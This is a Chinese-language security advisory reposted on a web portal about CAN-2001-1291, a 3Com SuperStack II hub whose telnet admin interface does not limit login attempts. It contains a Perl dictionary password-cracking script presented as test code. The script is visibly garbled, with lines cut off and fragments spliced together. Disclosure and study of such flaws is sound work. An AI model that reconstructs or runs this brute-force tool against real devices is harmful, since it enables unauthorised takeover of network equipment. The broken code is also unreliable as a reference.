3Com Telnetd 弱口令保护问题

2008-04-09 04:28:04来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

3Com Telnetd 弱口令保护问题

发布日期:2001-07-12
更新日期:2001-07-19

受影响系统:

3Com SuperStack II PS Hub 40
描述:

BUGTRAQ ID:3034
CVE(CAN) ID: CAN-2001-1291

某些3com交换机中存在一个潜在的安全问题。

如果远程攻击者试图登录基于telnet的管理接口,交换机没有限制允许登录的次数。因此
攻击者可以采用暴力猜测口令的方法快速获取对3com telnetd配置接口的访问权限。

攻击者可以控制交换机来进行进一步的攻击。

<*来源:Siberian (siberian@sentry-labs.com) *>




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Siberian (siberian@sentry-labs.com)提供了下列测试代码:

#!/usr/bin/perl -w

#######################esponsible for any damgae caused #
# by the###########################################
rf, chr(13), chr(10);

recv(SOCK,$ol,1,0);
$passwd,0);
}
recv(SOCK,$ol,1,0);
$i
}
$i=1;
}
print "\n\nIt's sad but true, you failed.\n";
}


print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n [target host] [dictionary] (username)";
$us= inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iesspass();

close(FILE1);
close(SOCK);
exit 0;




建议:

厂商补丁:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.3com.com



标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Interactive Story 目录遍历漏洞

下一篇:Martin Hamilton ROADS可远程察看系统文件内容漏洞